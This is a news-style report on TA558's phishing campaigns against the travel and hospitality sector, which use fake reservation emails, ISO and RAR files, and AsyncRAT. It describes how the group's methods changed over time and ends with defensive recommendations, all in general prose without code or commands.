Fake Travel Reservations Emerge as a New Front in Cyberattacks Targeting a Recovering Industry

The global travel and hospitality sectors, still navigating the choppy waters of post-pandemic recovery, are facing a new and insidious threat: sophisticated phishing campaigns leveraging fake travel reservations. This resurgence of malicious activity is spearheaded by a seasoned threat group, identified as TA558, which has intensified its operations to capitalize on the renewed surge in bookings and travel plans. Security researchers are issuing stark warnings, highlighting the evolving tactics of these cybercriminals who are transforming seemingly innocuous reservation confirmations into potent vectors for malware delivery.

The current wave of attacks, meticulously documented by cybersecurity firm Proofpoint, marks a significant evolution in TA558’s modus operandi. While the group has historically targeted the travel and hospitality industries since at least 2018, their latest campaigns exhibit a notable shift in delivery mechanisms. Moving away from their earlier reliance on malicious document attachments, TA558 is now frequently employing RAR and ISO file attachments, embedded within deceptive reservation emails. These compressed file formats, when executed by unsuspecting recipients, can unpack a payload of various malware strains, including potent Remote Access Trojans (RATs).

This strategic pivot, according to Proofpoint’s analysis, is likely a direct response to enhanced security measures implemented by major software providers. Microsoft’s announcements in late 2021 and early 2022 regarding the default disabling of macros in Office products (VBA and XL4) forced threat actors to seek alternative infiltration methods. TA558’s adoption of ISO and RAR files circumvents these macro-based defenses, presenting a fresh challenge for organizations and individuals alike.

The Evolving Tactics of TA558

TA558’s operational history paints a picture of a persistent and adaptable adversary. For years, the group has primarily focused its attention on organizations within the travel, hospitality, and related industries, with a particular emphasis on those located in Latin America, and occasionally extending its reach to North America and Western Europe. Their primary objective has consistently been financial gain, achieved through the theft of sensitive data and subsequent monetization.

The group’s initial attacks, dating back to 2018, often exploited vulnerabilities in Microsoft Word’s Equation Editor, such as CVE-2017-11882, a critical remote code execution bug. These exploits were designed to download and install RATs, with Loda and Revenge RAT being commonly observed payloads. These RATs provide attackers with the ability to remotely control infected machines, enabling them to conduct reconnaissance, exfiltrate data, and deploy further malicious software.

By 2019, TA558 demonstrated its adaptability by expanding its arsenal. This included the deployment of malicious macro-laced PowerPoint attachments and the exploitation of template injection techniques against Office documents. Notably, the group also broadened its targeting demographics, initiating the use of English-language phishing lures for the first time, indicating a strategic expansion of their potential victim pool.

The early months of 2020 proved to be TA558’s most prolific period, with the group launching an astonishing 25 malicious campaigns in January alone. During this surge, they predominantly utilized macro-laden Office documents or targeted known vulnerabilities within Office applications. This period underscores the group’s capacity for rapid and large-scale offensive operations.

The Current Campaign: A Shift in Delivery

The recent surge in TA558’s activity, particularly in 2022, has seen a dramatic increase in the use of URLs as a delivery mechanism, often leading to container files like ISOs or RARs. Proofpoint documented TA558 conducting 27 campaigns utilizing URLs in 2022, a significant jump from a mere five campaigns in total between 2018 and 2021.

The mechanics of infection in these new campaigns are designed to be deceptively simple. Victims receive an email that appears to be a legitimate travel reservation confirmation. However, embedded within this email are links that, upon closer inspection, lead to malicious files. In many instances, these links direct users to an ISO file, which is essentially a disc image file. When a user attempts to open or "mount" this ISO file, it can trick the operating system into treating it as a physical disc, revealing its contents. Among these contents is often a batch file (.BAT), a simple scripting language for Windows.

Upon execution, the batch file acts as a helper script, initiating a PowerShell process. PowerShell, a powerful command-line shell and scripting language built into Windows, is then leveraged to download and execute a more sophisticated follow-on payload. In the context of TA558’s recent activities, this payload has frequently been identified as AsyncRAT, a potent RAT that offers extensive remote control capabilities.

"The reservation link… led to an ISO file and an embedded batch file. The execution of the BAT file led to a PowerShell helper script that downloaded a follow-on payload, AsyncRAT," the researchers detailed in their report. This multi-stage approach allows the attackers to evade initial detection and establish a persistent presence on the compromised system.

Broader Implications for the Travel Industry

The implications of TA558’s persistent targeting of the travel and hospitality sector are far-reaching. For organizations within these industries, a successful breach can lead to severe financial losses, reputational damage, and significant operational disruptions. The theft of customer data, including personal identifiable information (PII) and payment card details, can result in identity theft, fraud, and a loss of customer trust.

"Its possible compromises could impact both organizations in the travel industry as well as potentially customers who have used them for vacations," stated Sherrod DeGrippo, Vice President of Threat Research and Detection Organizations at Proofpoint. This highlights the dual nature of the threat, where both businesses and their patrons are at risk.

The increased sophistication of TA558’s tactics, particularly the shift to ISO and RAR attachments, presents a challenge for traditional endpoint security solutions that may not be adequately configured to detect threats embedded within these file types. Moreover, the reliance on social engineering – crafting emails that mimic legitimate reservation confirmations – preys on the heightened anticipation and potential stress associated with travel planning.

A Chronology of TA558’s Evolution

• 2018: TA558 begins its focused targeting of the travel and hospitality sectors, primarily in Latin America. Early attacks exploit Microsoft Word vulnerabilities (e.g., CVE-2017-11882) to deliver RATs like Loda and Revenge RAT.
• 2019: The group expands its attack vectors to include macro-laced PowerPoint attachments and template injections against Office documents. They also begin using English-language phishing lures, broadening their target audience.
• Early 2020: TA558 experiences its most prolific period, launching numerous campaigns using macro-laden Office documents and exploiting known Office vulnerabilities.
• Late 2021 – Early 2022: Microsoft announces default disabling of macros in Office products.
• 2022 – Present: TA558 shifts its primary delivery mechanism to URLs, often leading to RAR and ISO file attachments containing payloads like AsyncRAT. The overall campaign tempo significantly increases.

Official Responses and Recommendations

While specific official responses from individual travel companies are not publicly detailed, the cybersecurity community is actively disseminating warnings and best practices. Security researchers strongly advise organizations within the targeted sectors to remain vigilant and implement robust security measures.

"Organizations in these and related industries should be aware of this actor’s activities and take precautions to protect themselves," DeGrippo urged. This includes:

• Enhanced Email Security: Implementing advanced email filtering solutions capable of detecting and blocking sophisticated phishing attempts, including those with malicious attachments.
• User Education and Awareness: Conducting regular security awareness training for employees, focusing on identifying phishing attempts, understanding the risks of opening unexpected attachments, and verifying the legitimacy of communications.
• Endpoint Detection and Response (EDR): Deploying EDR solutions that can monitor for malicious activity on endpoints, detect suspicious processes, and respond to threats in real-time.
• Regular Software Updates: Ensuring all operating systems, applications, and security software are kept up-to-date with the latest patches and security updates to mitigate known vulnerabilities.
• Principle of Least Privilege: Implementing strict access controls to limit the damage an attacker can inflict if they gain access to a system.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) also frequently issues alerts and advisement regarding evolving cyber threats, encouraging businesses to adopt a proactive and layered security approach. Their guidance often emphasizes the importance of network segmentation, intrusion detection systems, and incident response planning.

Looking Ahead: A Continuous Battle

The persistent evolution of TA558 underscores the dynamic nature of the cyber threat landscape. As the travel industry continues its recovery and booking volumes rise, it will likely remain a lucrative target for financially motivated threat actors. The group’s ability to adapt its tactics in response to security advancements suggests that future campaigns may involve even more novel delivery methods and sophisticated evasion techniques.

The shift to leveraging ISO and RAR files as primary infection vectors is a clear indicator that attackers are actively seeking ways to bypass traditional security controls. This necessitates a continuous reassessment of defensive strategies and a commitment to staying ahead of emerging threats. For travelers, increased vigilance regarding unsolicited emails, especially those pertaining to bookings or reservations, is paramount. Verifying the sender’s identity and scrutinizing links before clicking can significantly reduce the risk of falling victim to these malicious schemes. The ongoing battle against cybercrime in the travel sector will require a collaborative effort between cybersecurity professionals, businesses, and individuals to ensure a safer and more secure travel experience for all.